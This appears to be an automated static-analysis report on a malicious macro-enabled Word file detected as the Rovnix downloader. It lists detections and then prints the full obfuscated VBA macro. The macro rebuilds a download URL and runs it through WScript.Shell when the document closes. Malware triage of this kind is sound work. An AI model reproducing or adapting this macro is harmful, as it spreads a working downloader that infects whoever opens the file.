MALICIOUS
Risk Score: 232
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Rovnix-6497736-0. It contains VBA macros, specifically an Auto_Close macro that uses CreateObject to execute a second-stage payload. The presence of VBA macros and the downloader behavior strongly suggest a Rovnix family infection, likely delivered via spearphishing.
Heuristics 7
- ClamAV: Doc.Downloader.Rovnix-6497736-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
- VBA project inside OOXML (medium, 3 related findings, OOXML_VBA): Document contains a VBA project — VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  uAMiTvXWu = Acos(269) - 2280 - Acos(4545) - Acos(3280)
  Set JSGHUWNbQPiIVii = CreateObject(KvUDoXVnAHriGfXVrQ)
  Call JSGHUWNbQPiIVii.Run(MwYvLMGnrDcdyO, 0)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script:
  End Sub
  Sub AutoClose()
  pUkFjLWrCpP = 2807 + 2622
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14166 bytes |

SHA-256: b6f5f626347110fe1e6cabe4b40c62042317a6f6f75a8270461504003caaf217
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 336 of 400 identifiers look randomly generated (e.g. 'bjFkCRXZvBVELWYEYzVKZbgEhfZEdjzQnvNEwcdL') — consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub cquwTUpZAbMcoP()
pYvPdxFZDFb = Left("FuTVTPQcTy", 10) + "kTzUFOxBTVXE" + Left("dMHVofYWxp", 2) + "vPcPp" + "iBSgKjbHfNDWg"
SfcqCTUiJIK = 2386 + 2645 + Acos(1600) + 97 + Acos(3976) + Acos(2304)
IPjNOdZdRB = "CTQPSqX" + Left("PRBKHpnRCF", 7)
Application.Run "WunPJkSfdBfuUE"
RgGIgVUQLUj = Left("IcUVEIWoOo", 8) + "DBYPM" + Left("jBgbAyHVcG", 10) + "WJKHNJggdd" + "MJIO" + Left("ucIqVOcCDg", 1)
AnGXxbwFETjd = 4492 + Acos(4901) + Acos(2797) + 3998 + 4039
VFcNzZDcdZ = 2827 + 3529
gHbLELd = Acos(2858) + Acos(2545) + Acos(3611) + Acos(2362) + Acos(2712)
GFYQzScvSQy = 3635 - 4667 - 2232
TjGfNuS = Left("bZCFNUiOYB", 4) + Left("vTUAHUbfRj", 5)
cYJSjLEY = Acos(4265) + 1304 + 4386 + Acos(4171) + 2913 + 980 + Acos(2600)
End Sub
Sub TVTPQcTyZVFNkT()
TqiUpQNyZ = Acos(2647) + 2943 + 1026 + Acos(4268)
JkSfdBfuUEA = Acos(1762) - Acos(1120) - 30 - 1088 - 1528
dYvLuTzQnWbO = 954 - 4467 - 996 - Acos(4222) - Acos(2579)
Application.Run "HvFcEcjWKKTqNGkfVH"
gkIYBAgEMG = 2120 - Acos(1979) - Acos(3463) - Acos(4764) - 936 - 4646
kNSooXEf = Left("ouQnAfvMzg", 1) + Left("NADcOACIGF", 5) + "cAxxvHGGUcV" + "oQ" + "rNTMjxLdTPUQxE"
yniDGEwI = "zzbuFcN" + "dBQYWxSASDXoNyU" + Left("nRGVACvIrg", 8)
rTAHfIESErd = 3068 - 548 - Acos(2141)
End Sub
Function Acos(X)
Acos = Atn(X) - Atn(1)
End Function
Public Function ZnMMjLIvoULoc(CFpopKBKVnBnGwd, STJVQXbEcwEiLqcJr, UGXYVTrNBbxUxYR)
jXqYfPz = LTrim("BpfkupQEZidSxVCRO") + LTrim("A") + LTrim("kAZGnrVOSUdgMYQgUPX") + "UBgRApQcXFnRqwUUNiXCkSZuXXgGVA" + "PzTpVrQQvHdV" + "VyBXKBKDCLMq"
fnAfNzn = "nWEzNCEvrDXM" + "KRXCPOEcj" + "xXIEEnuWpYzEGDOuiELOZqbRQzj" + "UnYwHX"
LrdizVw = LTrim("MGCc") + "QyNnx" + "pXRowbdzkkGwKfdxvQPuiWxECGiT" + RTrim("ypAOxXWCQFzMKIJPAqRE")
zDdGvkjJowVu = Acos(4636) - 1358 - 1479 - Acos(2231) - Acos(449) - 494 - Acos(4534)
ZnMMjLIvoULoc = Replace(CFpopKBKVnBnGwd, STJVQXbEcwEiLqcJr, UGXYVTrNBbxUxYR)
dvuuJQJ = Acos(1418) - 3684 - 876
YWBHXYMrSNdo = Acos(2422) + 174 + 2289 + Acos(2084) + 2593 + Acos(592)
DXbjXTquqgwg = "QCxwM" + "NLiHnGpMY" + Left("JyTWGvKnpd", 4)
BLobFTJVyqp = LTrim("TwTnQFbInwSxrGrcRGRMYnzYCPEWHi") + RTrim("OQUkqzbbnfHcCzwGJDDC") + "gRRvruOXwDQSjxGMczkQTGk" + "LVkJuUSZgX" + LTrim("zikLExirBEJSfEufMVpnoGcVW")
byxMfOIkOjAb = Acos(3677) + Acos(4165) + 686
HdVoFRWPpTx = Acos(3834) - 4561 - Acos(4903) - Acos(3882) - 1798 - 505
vKUrRZWdfrQ = "BQCT" + "NXxuLEK" + "gNxPzBEjQC" + Left("XkuvjvwSdv", 4) + "jj"
QqxgCkiwqf = 515 - 1783 - Acos(1254)
UUgSNYBXc = Left("TOdVMbgFrK", 6) + "JNICuMc" + Left("yGZnQTxGvX", 10) + "ACpBdncG"
XDKPzBWS = "ZzzZgXHNpRbwpYu" + "EINIunyFMGrJuy" + "XLPgV"
EBBUoPJY = 4967 + 4600 + Acos(1973) + 3608 + 2306 + Acos(2420) + 4347
OPXAJbOTZrOw = 883 - 4410 - 4619 - 250 - 344
GPGpzpRpFZo = Left("kYOCubxGbZ", 7) + Left("KbSbonAYxH", 9) + Left("cYwUVvzkZT", 8) + Left("dwAPTVvJPA", 9)
End Function
Sub HvFcEcjWKKTqNGkfVH()
ZbDpBTHHGkG = Left("VPjiTEqTpI", 10) + Left("NDEniRVCDn", 5) + "gfFgxfnRk"
vLVPXEyEUd = "FciNdoTTWK" + Left("gWLfdkNwOW", 4)
ZIzxCrMjP = "IuVcGFYngIEIWRdArb" + "FxfUqIIdDLUKgHEwyOHwqkMzbu" + "iVdfgLGHnUZxUGFq"
KDQJXJwR = 1846 + 629 + Acos(3195)
rKzJzdWNgFr = LTrim("fYbEAduIZwfrkZFyZEBqV") + "ToUnxcwAxkiSvKyoojVXEMU" + "ZqNTEccnjFKXgHDOgEfKxowvIYOQ"
bXdXifTTcbrpR = "bjFkCRXZvBVELWYEYzVKZbgEhfZEdjzQnvNEwcdLfXRWZcWRd hfZEdjzQnvNEwfZEdjzQnvNEwp://qdkngijbqnwBykyxyiCpfYNhiqwrbzudwBykyxyiCpfYN.cobjFkCRXZvBVE/REX/LWYEYzVKZbgEiUTgXVLDkiiLick.php?ufZEdjzQnvNEwbjFkCRXZvBVEcdLfXRWZcWRd=bobjFkCRXZvBVEbf"
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "bjFkCRXZvBVE", "m")
DJwIqLFr = 1347 + Acos(3369) + 1372
XrkfWnwpB = 705 + 4394 + 2739
RzEqkQkEAjdi = 1287 - 1164 - 2727 - Acos(2654) - 2025
KGNqzvGOK = Left("ndCQTOLQoO", 4) + Left("YYDXWQjDFu", 8)
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "cdLfXRWZcWRd", "a")
UFTvGAiJWoFI = 4678 - 3742 - 4625 - 2734
dVMIzPQwz = 3688 + 160 + 1237 + Acos(1241)
HNJDQSFfwowE = "PkJZFTSDTqIRKX" + RTrim("u") + RTrim("Dqky") + "SXfBKQowIwJKUBubnBMDPoPNvcZOf" + RTrim("SrjGYPnpGuAZCSCFcSygfqP")
nwpddfHiSo = Acos(2948) - Acos(1138) - 4852 - 1587
yVYjUWJT = RTrim("jqiUJ") + LTrim("NpzWTYkVz") + "wp" + LTrim("FOLbzCFbIQKdTY")
SxnoCLgGu = "RJX" + "FoMupuLbNcg" + "YLBwOvJfy"
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "LWYEYzVKZbgE", "s")
kGKoJKYRixV = 1671 - Acos(3042) - 43 - 4512
ZCEiGVpr = 568 + Acos(162)
oJBxxgZgFCq = 2611 + Acos(671) + 3465
EQIwvgvUMETT = 2158 - Acos(4821)
xYMkUICb = Acos(1321) + Acos(3123)
zVByGgjVAHrN = 737 - 2638 - 2517
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "fZEdjzQnvNEw", "t")
BbxrdNu = Left("dySwCLHDNV", 10) + Left("YzzIykgziP", 4) + Left("uCEVxjZyfG", 8)
xrnGqurMKvu = Acos(2989) + Acos(2179) + 2070
KfBLyEG = "RJpkzrJIwcPwNgAv" + "cMIuzYZMXfGbIGdITHLvLMkCDbNXwg"
KFbMFknf = "VPTxnIk" + "zQHJQpjDcjOFwxwyBpyiGHUvAQr"
VTuvOpUGqWk = 1254 + 4206 + 3585
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "BykyxyiCpfYN", "e")
GRypEDUfi = "wxAjYxHAnHFKpSqzSDkRnz" + "V"
wdUHxPggGZn = 253 + Acos(3029) + 591 + Acos(2724) + 2598
MxCUyfd = Acos(4487) + 4274 + Acos(958) + Acos(4009) + 34 + 2744 + 875
NBbZkHBDbXFR = "ZPnJrfXuHUiAJD" + Left("IQjbriBiSv", 1)
bXdXifTTcbrpR = ZnMMjLIvoULoc(bXdXifTTcbrpR, "iUTgXVLDkiiL", "l")
bFFLKcjAI = LTrim("UC") + "yGCpxMyLTFTXTKIvRkVNNKz" + "xwMzDP"
jVFAoHcQPvNp = 2895 + Acos(3530) + 537 + 1403 + Acos(3919)
ncfIXOVoxvUDRpjLjC = "WScripTciikLiKwQjz.ShQHpCkALpojuJLGHHGPUnLHWcLGHHGPUnLHWc"
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "KIipNUvWNMpo", "m")
DJwIqLFr = 1347 + Acos(3369) + 1372
XrkfWnwpB = 705 + 4394 + 2739
RzEqkQkEAjdi = 1287 - 1164 - 2727 - Acos(2654) - 2025
KGNqzvGOK = Left("ndCQTOLQoO", 4) + Left("YYDXWQjDFu", 8)
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "DEoNgiZngzWk", "a")
UFTvGAiJWoFI = 4678 - 3742 - 4625 - 2734
dVMIzPQwz = 3688 + 160 + 1237 + Acos(1241)
HNJDQSFfwowE = "PkJZFTSDTqIRKX" + RTrim("u") + RTrim("Dqky") + "SXfBKQowIwJKUBubnBMDPoPNvcZOf" + RTrim("SrjGYPnpGuAZCSCFcSygfqP")
nwpddfHiSo = Acos(2948) - Acos(1138) - 4852 - 1587
yVYjUWJT = RTrim("jqiUJ") + LTrim("NpzWTYkVz") + "wp" + LTrim("FOLbzCFbIQKdTY")
SxnoCLgGu = "RJX" + "FoMupuLbNcg" + "YLBwOvJfy"
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "JBnKCrLFCwWg", "s")
kGKoJKYRixV = 1671 - Acos(3042) - 43 - 4512
ZCEiGVpr = 568 + Acos(162)
oJBxxgZgFCq = 2611 + Acos(671) + 3465
EQIwvgvUMETT = 2158 - Acos(4821)
BxSYYDG = Acos(4250) + 1796
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "TciikLiKwQjz", "t")
BbxrdNu = Left("dySwCLHDNV", 10) + Left("YzzIykgziP", 4) + Left("uCEVxjZyfG", 8)
xrnGqurMKvu = Acos(2989) + Acos(2179) + 2070
KfBLyEG = "RJpkzrJIwcPwNgAv" + "cMIuzYZMXfGbIGdITHLvLMkCDbNXwg"
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "QHpCkALpojuJ", "e")
GRypEDUfi = "wxAjYxHAnHFKpSqzSDkRnz" + "V"
wdUHxPggGZn = 253 + Acos(3029) + 591 + Acos(2724) + 2598
MxCUyfd = Acos(4487) + 4274 + Acos(958) + Acos(4009) + 34 + 2744 + 875
NBbZkHBDbXFR = "ZPnJrfXuHUiAJD" + Left("IQjbriBiSv", 1)
oYJvIYjC = 3693 - 3416 - Acos(4640) - 642 - 2390 - Acos(1929) - 2511 - Acos(4796)
ncfIXOVoxvUDRpjLjC = ZnMMjLIvoULoc(ncfIXOVoxvUDRpjLjC, "LGHHGPUnLHWc", "l")
bFFLKcjAI = LTrim("UC") + "yGCpxMyLTFTXTKIvRkVNNKz" + "xwMzDP"
jVFAoHcQPvNp = 2895 + Acos(3530) + 537 + 1403 + Acos(3919)
KFZDXMnLDkE = Left("HFjfSKAFqS", 1) + Left("RqXGRZvjFF", 6) + "NHGdojRnbGKEH" + Left("WWRFMBvENn", 1) + Left("GikxGgOnKf", 10)
zDjvSrwYSvGJ = Acos(4599) - Acos(2487) - Acos(4863) - Acos(4955) - Acos(4890)
DKqqAvSrO = Acos(1047) - 3888 - Acos(1910) - 1090 - 242
WPIxFMPUg = "SnZwdfGEFZoH" + "zJR" + Left("KzciSzboGW", 2) + Left("FjfpwocGXd", 7)
ZMXBqQgU = 719 - 2302 - Acos(764)
PMgSpEnvEE = "ONcVIdCf" + "UIxcJncfop" + "qrpIpGvKHWSTvX" + "NILuTRDYAvTUcU"
wjEOMIMNdNDObkruKn bXdXifTTcbrpR, ncfIXOVoxvUDRpjLjC
RdKCPOivxc = Left("PRxuQUCRYH", 7) + "ITLA" + "CgDLfOzdAKELrj"
qYHuiSIbxxR = Acos(3556) + Acos(1813) + 3414 + 925
IOiJvubUiNxk = Acos(1315) - Acos(2496) - Acos(30) - 831 - 3401 - 4360 - 4182 - 1537
byxMfOIkOjAb = Acos(3677) + Acos(4165) + 686
HdVoFRWPpTx = Acos(3834) - 4561 - Acos(4903) - Acos(3882) - 1798 - 505
vKUrRZWdfrQ = "BQCT" + "NXxuLEK" + "gNxPzBEjQC" + Left("XkuvjvwSdv", 4) + "jj"
QqxgCkiwqf = 515 - 1783 - Acos(1254)
fLqTEYVYpS = Acos(2198) + 3234 + Acos(3226) + 2543
WDHpDPNWNW = Acos(1825) + Acos(2609) + 4586 + 663
pJJPoKxD = 2508 - 4998 - Acos(3873) - 4259
End Sub
Sub wjEOMIMNdNDObkruKn(MwYvLMGnrDcdyO, KvUDoXVnAHriGfXVrQ)
QvHBHPB = "f" + "ocBDRFLqNfNQrfJwvDbJnSYUO"
GGUAHCvuvSyg = Acos(4199) - Acos(2388) - 1101
CJkpyikVgRi = Left("PryyDxiVOO", 2) + "KkipzjKb" + Left("HCbYxMQZXq", 7) + "TcVvi"
MHZGUvJxNgIA = 4385 - Acos(4943) - 2294 - Acos(2453) - 1304 - Acos(1757) - Acos(2607)
jxYzRVCUVodx = 2778 + 4948 + 2921 + 4292 + 1294
KvroZAorCpkM = 3367 + 1058 + Acos(4112) + Acos(3079) + Acos(772)
frGLvUuID = Acos(939) - 1815 - 1099 - 2781 - Acos(1861)
JTkkKDUZPZdS = Left("OAGYxVkTDJ", 1) + "BUIUgpccnOSU" + "CgoWzSvK" + "JodGwPAUNcRqqix"
HUIPOzLvnqU = Left("JYirpMHyLx", 6) + "PkWOoPWVDZjTNc" + "JfCUZYGD" + Left("vAxxNrvdnj", 10)
KBGjLvZ = 1591 + Acos(3073) + Acos(917) + 853 + 2507 + 769
uAMiTvXWu = Acos(269) - 2280 - Acos(4545) - Acos(3280)
Set JSGHUWNbQPiIVii = CreateObject(KvUDoXVnAHriGfXVrQ)
Call JSGHUWNbQPiIVii.Run(MwYvLMGnrDcdyO, 0)
LoNnUDvu = Left("uQCkOpQROQ", 10) + "ovQdqxuCv" + "gudRTwP" + "RuGxkbC"
OHKIiSbiSJ = "GE" + Left("AgAXdPNprC", 7) + Left("NofCCfIJnw", 7) + Left("GVpUTIUuSC", 1)
kTRnIBnqQ = "HOXOHrgXQN" + "ArNkqMYrFkyBjJIAyGMAiXrkLozT" + LTrim("nSrAvJ") + LTrim("cYcFWkS")
dvuuJQJ = Acos(1418) - 3684 - 876
YWBHXYMrSNdo = Acos(2422) + 174 + 2289 + Acos(2084) + 2593 + Acos(592)
End Sub
Sub WunPJkSfdBfuUE()
VBfbFFrXqKjD = "CCZBzrJbdRqKSjfpOVRd" + LTrim("u") + "zfqjDATEdKCxcw" + "IjAMciRRNZfpqBEAOOdyOHYFyngVq"
NSgTjkxY = "vkBn" + "QpKFIbPKUYqAvBHY"
SMTbMWqLwg = "qM" + "FCqGuSMqvPKfC" + Left("OfRXDZvYcE", 4) + "OqVBfojbuv"
Application.Run "AFxnSxnSPVHqnM"
MBNpDLxgxo = 4587 + 149 + 3385
ENDIFWkICZjB = Acos(1463) + 3495 + Acos(2751)
JoXRSJpGgdjW = 2114 + Acos(1609) + Acos(4752) + 3599
End Sub
Sub AutoClose()
pUkFjLWrCpP = 2807 + 2622
EOfvCow = Acos(3923) + Acos(1810) + Acos(215) + Acos(2816) + 3047 + 155 + 95 + 3148
IrZyyVLnI = 4704 + Acos(3732) + 1000 + 620 + Acos(3799) + 1774 + 1086
DuCSTJDgnEoX = "vNzZUOSCwv" + LTrim("pU") + "WwVMog" + "IbYqwYJpqkQPRKJOb"
RTXdKPi = "HNSDXIA" + "ooBBDiuwkRCxEQiLBcQdqYHMSIivB" + LTrim("uo") + RTrim("PSUSDqYyuYdOWvI") + RTrim("KVUDWoprwkJyccURGEw")
wPSYnuILzRWf = Acos(2876) + Acos(2366) + Acos(4110)
Application.Run "nyTqiUpQNyZIoP"
pgrjkKMC = 2490 + Acos(175) + Acos(3374) + Acos(4885) + 4061 + 1299
vjwYirS = 3885 + Acos(1597) + Acos(2671) + Acos(247) + 545
kqgdORY = "VrgwUnKyvGXqKEnRTKgyzbWS" + "CVzGnugwrV" + RTrim("ZVFiUJVnKQbwBGPGSMBvW") + "uBHPdYpWQOoCHXwzc"
ROyTADNRk = Acos(479) - Acos(2140) - Acos(256) - 199 - 1193 - Acos(658)
WzdWiRuQ = "rwkzQHcDbKRjnyBXcjAZQQNVi" + "uDJjbQLkDvVzBAQYiYrBorU" + "FbbgNQL" + "JIdrgAJMQHJnXWZwqQnpYboDQX"
wAkkYdAGxCx = 4971 + Acos(3884) + 2884 + Acos(3306) + 4369
fJdxpKFzz = "cXO" + "pY" + RTrim("NnGXOMidSYnMuBVibiSc")
End Sub
Sub nyTqiUpQNyZIoP()
iPfMZyyirJIX = 2946 - 824 - Acos(1432) - 1593 - Acos(3901)
GkkqyzNYGV = "qJvoKfPbxKkoHpDxcjpIW" + LTrim("SukBRfkbCiIVNzgTTzMdNicpLYnIFX") + "DSxYJbKMQycOWFozFGyHIf"
NzyHEvQBx = Acos(1508) - Acos(162) - Acos(1807) - Acos(2788) - 4087 - Acos(1289) - 2506
WZAoVQBLzi = LTrim("GFLAAMAoufEyoWQXQWH") + LTrim("FSSIbYKcOiExnALzvBQGIug") + "wYcvNAHnYwnprGPfy" + RTrim("QvbxYNPkSZMKNHUb")
iFUwBrzI = RTrim("ROMIgzRoRTcRkVvbUViWjNAgNLNL") + "ojWFRWxEgTwxinMbDJPWvzxgkoUY"
Application.Run "cquwTUpZAbMcoP"
ccGTujqoIj = Acos(4121) + Acos(618) + 85 + Acos(2410)
NyLqpJAkPK = Acos(4546) + Acos(4623) + Acos(2421) + 946 + 1670
NbZPryQo = Acos(3799) - 4146 - Acos(4523)
uvALvYKA = "kCoKPROZGxQWbpDrf" + RTrim("SAiAoHS")
YAJnTkCodC = Acos(3042) + Acos(4787) + 1384 + 1983
End Sub
Sub QnWbOTyZDTXLFu()
AJDRATuTVpC = Acos(3203) + Acos(3695)
PpkuWSqJcqy = "vSLAAgiZ" + "ATRyIIYjUE" + "GvX" + "Yiyn" + Left("HxPDRwDDDn", 3) + "NrJzjrEBq"
NLvGwxiQZpb = "XNCAkfIpfTxYzzoMyHicNNFdJLCx" + "dFSoNDpBBVRf" + RTrim("bzyQDCGwBUuiAvXJ") + "SyMPncHjKg"
yLFZuwq = "xkvAPLQ" + Left("TiOndQOgiP", 6) + "ybNdMVBPK" + "TNYqwHXBPTL" + Left("PdfncxXVUD", 4) + "KrLcWJFIIdVy"
Application.Run "TVTPQcTyZVFNkT"
uwXpcwj = 3376 + 3598 + 3425 + Acos(2179) + Acos(4956)
BdDHjjYxoNz = Acos(3489) + 3411 + 1384
End Sub
Sub AFxnSxnSPVHqnM()
XBKDUxBPFik = Acos(1477) + Acos(3775) + 4212 + Acos(3440) + 1944 + 162
OgISkDzKWHJ = 39 + Acos(3113) + 4588 + Acos(4635) + 2130 + Acos(860)
dkJyJwguqz = "qoEQRwCVn" + "NFxnpfYvf" + LTrim("uYK") + "RF"
Application.Run "uSHVEzXdYvLuTz"
WKYREfLYDGRu = "WvuIGdbGxkJPORxgLF" + LTrim("LZInkNcQKYVUUcL") + "vvWEuxKkIrbZLikUDEVkFFx" + "wRKwbwkSgKOuRHzyVBHkFjro"
JBYdcquOFJ = "SyfTKvyGRQ" + Left("ZknkAuiOUD", 3)
zqIEWrQncx = Left("WRBOwOvcQk", 7) + "SidwWIT" + Left("wEgfXRiHCW", 3) + "LvrZyZoVMu"
qngbIgoIBH = "iPLZoVgbpZNwKkRUBbfWgHNvFECBrW" + RTrim("LLYUdZwkAyU") + "FPDuQPibIUIkBnkJrrEOHq" + LTrim("bQZNdWDVQdxvydFIIqCSLE")
iooXWQORP = Acos(1682) + 894 + 2776 + Acos(3606) + 1993 + 4001 + Acos(4352)
End Sub
Sub uSHVEzXdYvLuTz()
OcGTWACNvdH = RTrim("pNgW") + "bjp" + "ToUQKqTiqiCXNZ" + LTrim("EvnjiwUyPMRDryHoZS")
rkZkLobjjTz = LTrim("FVjOKMnMgBOw") + "rBNSHuAQUyBjpVLVqHzCcLDTk" + LTrim("yKBwXWffPWzFHZUSHZCEErK") + "zcDEnEDLYQuCoYiPVHKVC" + LTrim("kvEOQxoSqciNLDfxIFAoovbqbInXj")
Application.Run "QnWbOTyZDTXLFu"
vdCgnNR = RTrim("rborHnruAIywnOILMG") + "FxDQJGWGv" + RTrim("dWRTdzBiSNPUCbGdJd")
CUfNgJcP = "AzynzTEKX" + RTrim("QzcbCIKD") + "yAwOWWu" + RTrim("NuJQTdbPwvzKSSiYyRcJHXAjF")
CZTNwxRT = Acos(2583) + Acos(1968) + 2725
TMJoKBTD = "qVKrYxVP" + Left("jPPFiGrWdd", 7) + Left("GzujXBXpFu", 6)
oHFBJyp = 3854 + Acos(2581) + Acos(3512) + 1487 + 285
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 38912 bytes |

SHA-256: 2e3aa35d7fc025330246bd690b98bf9b1f2bf1805b2c00d314b900246d7c49a4
Detection:
- ClamAV: Doc.Downloader.Rovnix-6497736-0
- Obfuscation or payload: likely. 808 of 1043 identifiers look randomly generated (e.g. 'bjFkCRXZvBVELWYEYzVKZbgEhfZEdjzQnvNEwcdL') — consistent with name-mangling obfuscation.